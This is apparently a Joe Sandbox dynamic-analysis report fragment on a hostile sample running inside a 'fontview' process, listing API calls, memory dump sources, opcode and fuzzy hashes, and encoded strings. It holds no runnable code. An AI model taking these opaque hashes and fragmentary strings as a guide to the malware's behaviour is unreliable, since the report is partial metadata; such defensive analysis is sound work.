                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: d9fe0be0307dcf11e3633c3f4ce64d59eecb1512e5bec849a940ab6788cd1b5e
                                                                                    • Instruction ID: fb55581f2226f0c74d65e64335064337a5f613fef5c5963dda740abd13168f98
                                                                                    • Opcode Fuzzy Hash: d9fe0be0307dcf11e3633c3f4ce64d59eecb1512e5bec849a940ab6788cd1b5e
                                                                                    • Instruction Fuzzy Hash: 3890022660151502E1017158944561A001A8BD0241FD5C023A1024555ECE258A92A131
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4742681098.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.4742681098.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_4fa0000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 4251b7625ca5e785a93481cb7433153aab5e6f1b2bd906ee2a4c0acde73448a1
                                                                                    • Instruction ID: 8a60a519ae54fe11859461a207db2814e05a22958ae8391f1dbf58e2a097d035
                                                                                    • Opcode Fuzzy Hash: 4251b7625ca5e785a93481cb7433153aab5e6f1b2bd906ee2a4c0acde73448a1
                                                                                    • Instruction Fuzzy Hash: A490026620191403E1407558984560B00158BD0302F95C012A2064555E8E298D516135
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4742681098.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.4742681098.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_4fa0000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 42d4934e2a73ac71be9bef85a08a5834dfe81fb15361b39b8aa7e983e6f7964b
                                                                                    • Instruction ID: 996375723fe8f3957f06eb50848730554ff2d325a0a051c8ecf0dae74dbf4af0
                                                                                    • Opcode Fuzzy Hash: 42d4934e2a73ac71be9bef85a08a5834dfe81fb15361b39b8aa7e983e6f7964b
                                                                                    • Instruction Fuzzy Hash: 3C90022624556102E150715C944561A4015ABE0201F95C022A0814594D895589556221
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4742681098.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.4742681098.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_4fa0000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 010b7026833eef15f02775362abd19bb23c7f750e341cc93b1d43b9b9ac7a804
                                                                                    • Instruction ID: 895028210dae2b8d2434671b78ae278ac299d61fb346a4d596c5c54ec8b1763a
                                                                                    • Opcode Fuzzy Hash: 010b7026833eef15f02775362abd19bb23c7f750e341cc93b1d43b9b9ac7a804
                                                                                    • Instruction Fuzzy Hash: 839002662025100351057158945561A401A8BE0201B95C022E1014590DC92589916125
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4742681098.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.4742681098.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_4fa0000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 2159a6f086126b9f769a98ed02bd40ce36fe07629d3aa693faaedd95ece65e95
                                                                                    • Instruction ID: fc738a76d39ba36a1558b046eea17cf832e6cfe38fbafe97f7d11f5f08a3bcb4
                                                                                    • Opcode Fuzzy Hash: 2159a6f086126b9f769a98ed02bd40ce36fe07629d3aa693faaedd95ece65e95
                                                                                    • Instruction Fuzzy Hash: 3E90023660551802E1507158945574A00158BD0301F95C012A0024654D8B558B5576A1
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4742681098.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.4742681098.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_4fa0000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: a583c0eb9595a56b03d407239e4b2b8607bda4e174b1fda87b932a2c6d534469
                                                                                    • Instruction ID: 825bb34983ee0bb1fe10e24d16944b3f822f3f01c06b557d0926874d944daffb
                                                                                    • Opcode Fuzzy Hash: a583c0eb9595a56b03d407239e4b2b8607bda4e174b1fda87b932a2c6d534469
                                                                                    • Instruction Fuzzy Hash: 5E90023620555842E14071589445A4A00258BD0305F95C012A0064694D9A258E55B661
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4742681098.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.4742681098.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_4fa0000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 3a8cb86d0921b1e436e41b448f0472a3ae2e0574d06e769ddff240bf1684219d
                                                                                    • Instruction ID: 304631f5c28fce24f77cc6f82105bda6897afc9380e3d8c5a6a5226fbb3118f4
                                                                                    • Opcode Fuzzy Hash: 3a8cb86d0921b1e436e41b448f0472a3ae2e0574d06e769ddff240bf1684219d
                                                                                    • Instruction Fuzzy Hash: 3690023620151802E1807158944564E00158BD1301FD5C016A0025654DCE158B5977A1
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4742681098.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.4742681098.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_4fa0000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: e6eabccd4381a936839e65650382af6e11fe89b1f28641763965f83b4025886b
                                                                                    • Instruction ID: 10a676f7acba9947304bb8977130577b035ea6612232b849ac9b6a5fb341a650
                                                                                    • Opcode Fuzzy Hash: e6eabccd4381a936839e65650382af6e11fe89b1f28641763965f83b4025886b
                                                                                    • Instruction Fuzzy Hash: 4B90022A211510031105B558574550B00568BD5351395C022F1015550CDA2189615121
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4742681098.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.4742681098.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_4fa0000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 7f2cb5963a27f10596b587cd4128078c4ce00c668e9fec5fd27c56d945177084
                                                                                    • Instruction ID: 139ee3ff127c57770c7cfaf9aaa1f666823bcfec16eacd5a839215cce8e397f5
                                                                                    • Opcode Fuzzy Hash: 7f2cb5963a27f10596b587cd4128078c4ce00c668e9fec5fd27c56d945177084
                                                                                    • Instruction Fuzzy Hash: FD90022A221510021145B558564550F04559BD63513D5C016F1416590CCA2189655321
                                                                                    APIs
                                                                                    • Sleep.KERNELBASE(000007D0), ref: 03023C9B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4740507433.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_3000000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: Sleep
                                                                                    • String ID: net.dll$wininet.dll
                                                                                    • API String ID: 3472027048-1269752229
                                                                                    • Opcode ID: 8d82e1f8c2f85837880e0bdd9c7dedb4ca43be27d8588d44f07e26a411c768b7
                                                                                    • Instruction ID: 4066600ab8fb6cb8f751fb8c892e6212a99b86c4fd0d465b01c0682fcafe9611
                                                                                    • Opcode Fuzzy Hash: 8d82e1f8c2f85837880e0bdd9c7dedb4ca43be27d8588d44f07e26a411c768b7
                                                                                    • Instruction Fuzzy Hash: 2F316EB5602715BBD714DFA4CC80FEBBBB9FB88710F144559E919AB280D374AA40CBA4
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4740507433.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_3000000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeUninitialize
                                                                                    • String ID: @J7<
                                                                                    • API String ID: 3442037557-2016760708
                                                                                    • Opcode ID: 7f947d0f90d277a259a2254258f86a3f2acb77a42b713b0cce0639a39238ae61
                                                                                    • Instruction ID: 21afa284e28edb31fc33ca1b58adcf1e3c002fc3545ab0660d37d419b04db48c
                                                                                    • Opcode Fuzzy Hash: 7f947d0f90d277a259a2254258f86a3f2acb77a42b713b0cce0639a39238ae61
                                                                                    • Instruction Fuzzy Hash: E1312FB6A1060AAFDB00DFD8D8809EFB7B9FF88304B148559E505EB214D775EE05CBA0
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4740507433.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_3000000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeUninitialize
                                                                                    • String ID: @J7<
                                                                                    • API String ID: 3442037557-2016760708
                                                                                    • Opcode ID: 5d2add8fe2347f129de0a447a56305ea7e9c16457bcf4eb0b417769999782aa6
                                                                                    • Instruction ID: 5f9cc71094290cf2cea76c9367744ff7f96c15952f5b3a78f61df787a89637cd
                                                                                    • Opcode Fuzzy Hash: 5d2add8fe2347f129de0a447a56305ea7e9c16457bcf4eb0b417769999782aa6
                                                                                    • Instruction Fuzzy Hash: 6C3132B6A0060AAFDB00DFD8D8809EFB7B9FF88304B148559E505EB214D775EE05CBA0
                                                                                    APIs
                                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 030146C2
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4740507433.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_3000000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: Load
                                                                                    • String ID:
                                                                                    • API String ID: 2234796835-0
                                                                                    • Opcode ID: 328f7731dc45a0544d32d6300f712176fbe69daf62c9c17ae9a2f7434cffa9bc
                                                                                    • Instruction ID: 0439ee93638020508fc409f9a62966bb35101f28f01e825f5ec328bedc55bf86
                                                                                    • Opcode Fuzzy Hash: 328f7731dc45a0544d32d6300f712176fbe69daf62c9c17ae9a2f7434cffa9bc
                                                                                    • Instruction Fuzzy Hash: 27015EBAE0120DABDB10DBE1DC41FDDB7B89B54308F0481A5E9089B250FA31E7188B91
                                                                                    APIs
                                                                                    • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,0301841E,00000010,00000000,?,?,00000044,00000000,00000010,0301841E,?,?,00000000), ref: 03029A63
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4740507433.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_3000000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateInternalProcess
                                                                                    • String ID:
                                                                                    • API String ID: 2186235152-0
                                                                                    • Opcode ID: f44209bbd5e9ad90f10f44b1f22fe67f40c738fdc67aed1c66a4cbf11cdf456e
                                                                                    • Instruction ID: 894df519019454d94c3661f1399441d3318755e7a1880a8f1a288873ef2fdf3b
                                                                                    • Opcode Fuzzy Hash: f44209bbd5e9ad90f10f44b1f22fe67f40c738fdc67aed1c66a4cbf11cdf456e
                                                                                    • Instruction Fuzzy Hash: 2A01C0B6215208BFCB44DF99DC80EDB77ADAF8D754F408108FA1DA7240D630F8518BA4
                                                                                    APIs
                                                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03009E65
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4740507433.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_3000000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateThread
                                                                                    • String ID:
                                                                                    • API String ID: 2422867632-0
                                                                                    • Opcode ID: 9729daee34e36f090933b1b24afea412076cd2ae6227c0d2c387de267186fa96
                                                                                    • Instruction ID: 00dd9a51271751d66074c13360006a5e2d58674e146d2d79f15b061becbd025c
                                                                                    • Opcode Fuzzy Hash: 9729daee34e36f090933b1b24afea412076cd2ae6227c0d2c387de267186fa96
                                                                                    • Instruction Fuzzy Hash: 16F0397B3857147AF220A5E99C02FDBB68C9B81AA1F140025FB0CEA1C0D995B80242A9
                                                                                    APIs
                                                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03009E65
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4740507433.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_3000000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateThread
                                                                                    • String ID:
                                                                                    • API String ID: 2422867632-0
                                                                                    • Opcode ID: b7976a58c2de71c4577e8520ea41a7750b5dedcc816b9e662e0346ca6d9cb5f8
                                                                                    • Instruction ID: 59cf61082c992502dea80865620663172f543ec1d4dab67b134b8805ddad59cb
                                                                                    • Opcode Fuzzy Hash: b7976a58c2de71c4577e8520ea41a7750b5dedcc816b9e662e0346ca6d9cb5f8
                                                                                    • Instruction Fuzzy Hash: BFF0927B7417107AF230AAE48C02FC7B6589F81BA1F150114F708AF1C0DAA5780187A5
                                                                                    APIs
                                                                                    • RtlAllocateHeap.NTDLL(03011B69,?,03025ED1,03011B69,?,03025ED1,?,03011B69,030257BF,00001000,?,00000000), ref: 0302995F
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4740507433.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_3000000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1279760036-0
                                                                                    • Opcode ID: eac7b7826e2e82e196d20feb5be9869bea6dc39668a5f8f93e263b85d279cf1c
                                                                                    • Instruction ID: 06538a8856650e93547630cb9ad0c6e79c3b14ca9f151b86d60b310ee4517285
                                                                                    • Opcode Fuzzy Hash: eac7b7826e2e82e196d20feb5be9869bea6dc39668a5f8f93e263b85d279cf1c
                                                                                    • Instruction Fuzzy Hash: AAE032BA200314BBE614EA98DC40FEB77ACEBC9710F004019F909AB241DA20B9118AB5
                                                                                    APIs
                                                                                    • RtlFreeHeap.NTDLL(00000000,00000004,00000000,8B00017E,00000007,00000000,00000004,00000000,03013EF6,000000F4), ref: 030299AF
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4740507433.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_3000000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: FreeHeap
                                                                                    • String ID:
                                                                                    • API String ID: 3298025750-0
                                                                                    • Opcode ID: 10e78dc5911c11bf1ba16f4a6a310104beaa8b86ec4fe8ff6c030c8a8362ebdc
                                                                                    • Instruction ID: 53710b809653845384cde777e8e2d42d72d3101240a59673d0345947b985624a
                                                                                    • Opcode Fuzzy Hash: 10e78dc5911c11bf1ba16f4a6a310104beaa8b86ec4fe8ff6c030c8a8362ebdc
                                                                                    • Instruction Fuzzy Hash: CCE0397A2003047FD614EE59DC40F9B37ACDBC5710F408018F918A7241CA70B81187B5
                                                                                    APIs
                                                                                    • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 0301848C
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4740507433.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_3000000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: AttributesFile
                                                                                    • String ID:
                                                                                    • API String ID: 3188754299-0
                                                                                    • Opcode ID: 785834ad9b7a0a25a7fe3e86688d979d84857120df23c7f05a8106eebc302e59
                                                                                    • Instruction ID: 30dc379619d80b03b3ae9ea9e6c3045e882284d3e51212e605ff1a7d170f8aa8
                                                                                    • Opcode Fuzzy Hash: 785834ad9b7a0a25a7fe3e86688d979d84857120df23c7f05a8106eebc302e59
                                                                                    • Instruction Fuzzy Hash: 9FE0207160030467E734D5A8DC41F633388574C638F0C8650FA1CCB9C1D578F5114150
                                                                                    APIs
                                                                                    • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 0301848C
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4740507433.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_3000000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: AttributesFile
                                                                                    • String ID:
                                                                                    • API String ID: 3188754299-0
                                                                                    • Opcode ID: 72a81d3bfc2b94c72575b981efc9c0de1cb302cba50d77803bb7954b2e02d500
                                                                                    • Instruction ID: 9fad4df8a42c115ea80917e0ec41b9760fccbd455b506fe1930946bd0bd1ef75
                                                                                    • Opcode Fuzzy Hash: 72a81d3bfc2b94c72575b981efc9c0de1cb302cba50d77803bb7954b2e02d500
                                                                                    • Instruction Fuzzy Hash: B1E0D8726003006BE73496788C45B9677546B8A238F0C8750F5989F9C1D774E2128240
                                                                                    APIs
                                                                                    • SetErrorMode.KERNELBASE(00008003,?,?,03011E60,030280FF,?,03011E30), ref: 03018283
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4740507433.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_3000000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorMode
                                                                                    • String ID:
                                                                                    • API String ID: 2340568224-0
                                                                                    • Opcode ID: d2c0cdfa6be24378bf2234a29427524c706c9e763b053ae8809cbb78714bba8f
                                                                                    • Instruction ID: 316eac8a3abf2d4456333592017b3e996f191f939e20ab021b613ef5fc43a9df
                                                                                    • Opcode Fuzzy Hash: d2c0cdfa6be24378bf2234a29427524c706c9e763b053ae8809cbb78714bba8f
                                                                                    • Instruction Fuzzy Hash: 58D0A7BA7453047BF645E7F4CC02F9672CC9B82764F088064FA0CDB2C1ED64F1004665
                                                                                    APIs
                                                                                    • PostThreadMessageW.USER32(?,00000111), ref: 03010F37
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4740507433.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_3000000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePostThread
                                                                                    • String ID:
                                                                                    • API String ID: 1836367815-0
                                                                                    • Opcode ID: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                                    • Instruction ID: 583963ab194b541f120e0953553e0bc21f13886a9259b81c2b378241bd00a2cd
                                                                                    • Opcode Fuzzy Hash: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                                    • Instruction Fuzzy Hash: ABD02277B0100C3AEA0285C4ACC2CFFB76CEB84AA6F0040A7FF0CE2040E6218D060BB0
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4742681098.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 0000000A.00000002.4742681098.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_4fa0000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 582c3ce8d36b3b0e375ae8eeb443f1757f4ade929f48cd1563abe4c2718574f0
                                                                                    • Instruction ID: f172b0ade58c2418d9d5710c7bc8606cd2f96bd9f7e672eae44780fe50b17fb1
                                                                                    • Opcode Fuzzy Hash: 582c3ce8d36b3b0e375ae8eeb443f1757f4ade929f48cd1563abe4c2718574f0
                                                                                    • Instruction Fuzzy Hash: 6BB09B769015D6C6EA51E7605609B1F79517BD0701F55C062D3030641F4738C1D1E176
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4742545018.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_4eb0000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 29ed0a75125f896947cf94107eec4693073da9ec50a6fc986515006cfcaf37b3
                                                                                    • Instruction ID: a1a589a6a2515e50082fc5b827f53804e1b50ba4db3fdbaf60038158710121bd
                                                                                    • Opcode Fuzzy Hash: 29ed0a75125f896947cf94107eec4693073da9ec50a6fc986515006cfcaf37b3
                                                                                    • Instruction Fuzzy Hash: 0941B571919F0D4FD368EF6890816B7B3E2FB49304F506A2DD9CAC3652EA70F84686C5
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4740507433.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_3000000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ddd429c905d7fc92482c24bc86efa7194110a231d5781e202790b7bd3cce7c98
                                                                                    • Instruction ID: 6ea084c0cdd99382d33f268dc3b5c9ab63dbf5618e82e22b2d6aa59dcea3d10b
                                                                                    • Opcode Fuzzy Hash: ddd429c905d7fc92482c24bc86efa7194110a231d5781e202790b7bd3cce7c98
                                                                                    • Instruction Fuzzy Hash: 1AC01226B5509409E715490D78525F0EF58838B131F4532E7D88CEB0628142D481019C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4742545018.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_4eb0000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                    • API String ID: 0-3558027158
                                                                                    • Opcode ID: b300e2c37c9779acf31ea3186456be968af506a9cdb10be04d46ff93976ec054
                                                                                    • Instruction ID: 7ba1bb2eea844a8f0cb7946563dfccb62105409ca2b07fc25c4429e12e785f55
                                                                                    • Opcode Fuzzy Hash: b300e2c37c9779acf31ea3186456be968af506a9cdb10be04d46ff93976ec054
                                                                                    • Instruction Fuzzy Hash: 9E9151F04482948AC7158F58A0652AFFFB1EBC6305F15816DE7E6BB243C3BE8945CB85
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4742545018.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_4eb0000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: #><=$$[eb$,BX,$,[eb$,hi7$,~z6$7,Y7$9"<,$9,Je$:$:"<7$<<==$="5"$>%,K$Acve$``m#$iogc$t#?"$~ijc
                                                                                    • API String ID: 0-4132280230
                                                                                    • Opcode ID: b68fdc5242ea4937ac137d0c9eabe1aa317e92f5e14891a8b9650c44889e7fc0
                                                                                    • Instruction ID: 0cef7a45d61d2216b5a25d342a4885cad88307e2dd7ba99d81edd8121dc71d5b
                                                                                    • Opcode Fuzzy Hash: b68fdc5242ea4937ac137d0c9eabe1aa317e92f5e14891a8b9650c44889e7fc0
                                                                                    • Instruction Fuzzy Hash: DB211BB5C087AC8ADB148FC1EA98AECBBB0FB0A304F91628DC4056F216C7344906CF95
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4742681098.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
